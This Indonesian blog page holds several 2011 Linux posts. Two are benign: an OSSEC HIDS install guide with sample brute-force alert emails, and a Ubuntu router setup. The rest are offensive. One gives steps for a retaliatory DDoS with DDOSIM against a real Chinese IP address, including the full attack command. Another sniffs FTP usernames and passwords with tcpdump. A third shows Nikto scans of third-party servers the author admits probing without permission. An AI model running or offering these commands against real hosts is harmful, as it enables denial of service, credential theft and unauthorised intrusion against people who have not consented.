IDS with OSSEC HIDS

Implementasi IDS ( intrusion detection systems ) di linux dengan menggunakan OSSEC HIDS.

OSSEC HIDS, adalah paket aplikasi yang digunakan untuk memonitoring sistem dari aktifitas-aktifitas yang dianggap mengancam (menyerang) dan kemudian membuat log dan mampu memberikan peringatan via email ke system administrator.

OSSEC adalah aplikasi yang mampu berjalan multi platform, jadi silahkan anda implementasikan sesuai dengan sistem operasi yang anda gunakan, berikut adalah cara instalasi dan konfigurasi diatas sistem operasi linux, tepat nya ubuntu server 11.04.

1. Pastikan paket dasar di ubuntu telah lengkap, untuk menginstallnya;

$ sudo apt-get install build-essential

2. Download versi terbaru ossec , pada saat ini 2.6

$sudo wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz

3.Extract

$sudo tar -xzvf ossec-hids-2.6.tar.gz

4.masuk ke direktory extract dan jalankan perintah install.sh dan ikuti pentunjuk yang diberikan.

cd ossec-hids-2.6

./install.sh

berikut tampilan yang akan tampil kurang lebih ^_^;

----------

** Para instalação em português, escolha [br].
** Fur eine deutsche Installation wohlen Sie [de].
** For installation in English, choose [en].
** Per l'installazione in Italiano, scegli [it].
** Aby instalowac w jezyku Polskim, wybierz [pl].
** Türkçe kurulum için seçin [tr].
(en/br/de/it/pl/tr) [en]: en
OSSEC HIDS v0.8 Installation Script - http://www.ossec.net

You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).

- System: Linux diana 2.6.15-25-k7
- User: root - Host: xpredator


-- Press ENTER to continue or Ctrl-C to abort. --


1- What kind of installation do you want (server, agent, local or help)? local
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.

3.1- Do you want e-mail notification? (y/n) [y]: y
- What's your e-mail address? emailkita@email.com
- What's your SMTP server ip/host? your smtp server address (localhost)

3.2- Do you want to run the integrity check daemon? (y/n) [y]: y

- Running syscheck (integrity check daemon).

3.3- Do you want to run the rootkit detection engine? (y/n) [y]: y

- Running rootcheck (rootkit detection).

3.4- Active response allows you to execute a specific
command based on the events received. For example,
you can block an IP address or disable access for
a specific user.
More information at:

http://www.ossec.net/en/manual.html#active-response

- Do you want to enable active response? (y/n) [y]: y

- Active response enabled.

- By default, we can enable the host-deny and the
firewall-drop responses. The first one will add
a host to the /etc/hosts.deny and the second one
will block the host on iptables (if linux) or on
ipfilter (if Solaris, FreeBSD or NetBSD).
- They can be used to stop SSHD brute force scans,
portscans and some other forms of attacks. You can
also add them to block on snort events, for example.

- Do you want to enable the firewall-drop response? (y/n) [y]: y

- firewall-drop enabled (local) for levels >= 6

- Default white list for the active response:

- 192.168.2.1

- Do you want to add more IPs to the white list? (y/n)? [n]: n

3.6- Setting the configuration to analyze the following logs:

-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/log/mail.info
-- /var/log/apache2/error.log (apache log)
-- /var/log/apache2/access.log (apache log)

- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .

--- Press ENTER to continue ---
- Unknown system. No init script added.
- Configuration finished properly.

- To start OSSEC HIDS:

/var/ossec/bin/ossec-control start

- To stop OSSEC HIDS:

/var/ossec/bin/ossec-control stop

- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
(http://mailman.underlinux.com.br/mailman/listinfo/ossec-list).

More information can be found at http://www.ossec.net

--- Press ENTER to finish (maybe more information bellow). ---

/etc/init.d/ossec start

contoh tampilan (real) alert ke email ane, ;

----

OSSEC HIDS Notification.

2011 Aug 01 06:49:06

Received From: xpredator->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Aug 1 06:49:04 xpredator sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:55 xpredator sshd[31491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:45 xpredator sshd[31435]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:35 xpredator sshd[31426]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:26 xpredator sshd[31358]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:16 xpredator sshd[31302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:07 xpredator sshd[31295]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:47:58 xpredator sshd[31249]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root


--END OF NOTIFICATION



OSSEC HIDS Notification.
2011 Aug 01 06:49:08

Received From: xpredator->/var/log/auth.log
Rule: 5720 fired (level 10) -> "Multiple SSHD authentication failures."
Portion of the log(s):

Aug 1 06:49:06 xpredator sshd[31563]: Failed password for root from 122.228.197.134 port 59870 ssh2
Aug 1 06:48:57 xpredator sshd[31491]: Failed password for root from 122.228.197.134 port 59156 ssh2
Aug 1 06:48:47 xpredator sshd[31435]: Failed password for root from 122.228.197.134 port 58373 ssh2
Aug 1 06:48:37 xpredator sshd[31426]: Failed password for root from 122.228.197.134 port 57604 ssh2
Aug 1 06:48:28 xpredator sshd[31358]: Failed password for root from 122.228.197.134 port 56851 ssh2
Aug 1 06:48:18 xpredator sshd[31302]: Failed password for root from 122.228.197.134 port 56104 ssh2
Aug 1 06:48:09 xpredator sshd[31295]: Failed password for root from 122.228.197.134 port 55355 ssh2
Aug 1 06:47:59 xpredator sshd[31249]: Failed password for root from 122.228.197.134 port 54609 ssh2

--END OF NOTIFICATION

=============

Read more »

DDOS dalam BT 5

IDS (intrusion detection system) memberikan alert telah terjadi upaya serangan ke salah satu server ane, dan ane dapatin IP nya berasal dari China.

Selanjutnya ane respon dengan mencari tau dan scanning host IP tersebut sebagai respon balasan, gak puas ane coba serang DDOS dengan DDOSIM ke salah satu port yang terbuka dan potensial untuk diserang menurut ane. ^_^

berikut langkah2 nya

1. download ddosim di http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz

2. extract #tar -zxvf ddosim-0.2.tar.gz

3. ikuti perintah berikut :

#cd ddosim

#./configure

#make

#make install

4. ddosim siap digunakan, berikut petunjuk penggunannya ;

-------------------

# DDOSIM: Layer 7 DDoS Simulator v0.2
# Author: Adrian Furtuna


Usage: ./ddosim
-d IP Target IP address
-p PORT Target port
[-k NET] Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME] Output interface name
[-c COUNT] Number of connections to establish
[-w DELAY] Delay (in milliseconds) between SYN packets
[-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS] Number of threads to use when sending packets ( default 1)
[-n] Do not spoof source address (use local address)
[-v] Verbose mode (slower)
[-h] Print this help message

-------------------------------------------
contoh pengunaan :
# ddosim -d 122.228.197.134 -p 80 -r HTTP_INVALID -w 2 -c 5-t 5

selamat mencoba ^_^



note :
* pastikan telah terinstall library ; libnet0-dev disistem anda,
* dosa tanggung sendiri kalo ngerjain orang :p

Read more »

Ubuntu sebagai Router

Untuk menjadikan ubuntu sebagai router, dengan skema ;

Modem -- Router -- Lan

modem : 192.168.2.1

Router : eth0 -> 192.168.1.1 ( untuk kedalam LAN )
eth1 -> IP didapat dari dial up modem ( biarin otomatis aja )
LAN : 192.168.1.0/24
note : pastikan router anda memiliki minimal 2 ( dua ) NIC, kalo satu mah gak router bakal jadi router dong ^_^

1. untuk dial modem dari router silahkan baca di dial up modem

2. konfigurasi kartu jaringan di ubuntu baca di konfigurasi IP static ubuntu

3. Nah langkah tambahannnya ada disini, edit pada file /etc/sysctl.conf

dan hilangkan tanda "#" pada baris

#net.ipv4.ip_forward=1

sehingga menjadi ( gunakan editor kesukaan anda )

net.ipv4.ip_forward=1 4. masukkan rule masquerade pada file /etc/rc.local sebelum exit 0 contoh rule :

bagi yang dial up modem dari ubuntu masukkan ;

iptables -t nat –A POSTROUTING –o ppp0 –j MASQUERADE

bagi yang dial dari modem ;

iptables -t nat –A POSTROUTING –s 192.168.1.0/24 –o eth1 –j MASQUERADE

pada "192.168.1.0/24" diganti dengan range IP untuk ke LAN internal sedangkan -0 eth1 diganti dengan NIC yang kearah modem ( external ), untuk melakukannya silahkan gunakan kembali editor kesukaan anda.

5. restart semua service networking

$sudo /etc/init.d/networking restart

$sudo sysctl -p

kalau mau direstart juga boleh, dan untuk client di set range ip antara 192.168.1.2 - 192.168.1.254 dengan gateway 192.168.1.1.

okeh itu aja dulu, ntar disambung dengan set proxy dengan squid.

good luck ^_^

Read more »

Tcpdump target port 21 ( FTP )

Jalankan perintah tcpdump di pc anda untuk menangkap username dan password ke FTP server, berikut perintahnya ;

#tcpdump -q -i eth0 -n -A port 21 > target.txt

setelah beberapa saat tekan tombol Ctrl + C untuk menghentikan sniffing, dan akan terlihat jumlah paket yang berhasil ditangkap.

untuk melakukan filter agar hanya username dan password saja yang ditampilkan , jalankan perintah ;

#cat target.txt | grep USER ; cat target.txt | grep PASSWORD

jika anda beruntung, username dan password akan ditampilkan.

oke good luck ;)

Read more »

Nikto part I

Salah satu program untuk scanning server yg terkenal adalah nikto ( cirt.net ) , berikut penulis mencoba untuk memberikan contoh implementasinya untuk scan server web, btw maaf ya yang punya server ane cuman iseng dan tidak merusak sistem anda jika ada intruder lain di sistem anda sama sekali saya tidak terlibat didalamnya ^_^.

1. contoh scan paling dasar dari nikto

root@bt:/pentest/web/nikto# perl nikto.pl -h jehz.com.my
- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 204.45.108.42 + Target Hostname: jehz.com.my + Target Port: 80 + Start Time: 2011-08-02 21:19:39 --------------------------------------------------------------------------- + Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 + Root page / redirects to: http://jehz.com.my/cgi-sys/suspendedpage.cgi + mod_ssl/2.2.19 appears to be outdated (current is at least 2.8.31) (may depend on server version) + Number of sections in the version string differ from those in the database, the server reports: openssl/0.9.8e-fips-rhel5 while the database has: 1.0.0.100. This may cause false positives. + OpenSSL/0.9.8e-fips-rhel5 appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current. + FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version) + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html + mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found. + /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
--- cut ---

dari contoh keterangan diatas terlihat bahwa target memiliki beberapa bug dan masih ada lagi dibawahnya.
2. Untuk scan target dengan port tertentu

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 443

- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 204.45.108.42 + Target Hostname: bliss.theservergroup.info + Target Port: 443 + Start Time: 2011-08-02 22:33:56 ---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

3.Scan terhadap beberapa port tertentu ;

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 80,88,443,22,21

- Nikto v2.1.4 --------------------------------------------------------------------------- + No web server found on bliss.theservergroup.info:88 ---------------------------------------------------------------------------

heheh itu aja dulu untuk kombinasi dengan tools lain ntar aja.... lagian orang tadarusan ane malah liat-liat yg gak ane... ntar malah merusak puasa ane ^_^.

Read more »